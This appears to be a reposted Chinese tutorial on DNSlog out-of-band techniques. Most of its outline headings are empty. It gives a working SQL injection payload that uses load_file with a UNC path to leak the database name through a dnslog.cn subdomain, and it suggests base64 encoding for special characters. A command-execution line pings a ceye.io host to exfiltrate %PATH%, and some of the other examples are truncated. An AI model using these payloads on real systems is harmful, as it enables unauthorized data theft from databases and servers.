0x00 DNSlog 介绍
首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件,
0x01 DNSlog回显原理
0x02 DNSlog 应用
0x03 DNSlog回显注入条件
0x04 DNSlog -sql注入
?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+

在回显数据时,域名能够接受的字符是有条件限制的,某些不适合作为域名的特殊字符可能会被屏蔽掉,针对这种情况我们也可以base64编码后再进行请求。
0x05 DNSlog 其他应用
1.xss盲打
""
2.SSRF
"...
..."
3.命令执行
" ping %PATH%.pxxx.ceye.io ..."
" > %all;
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/208181.html原文链接:https://javaforall.net
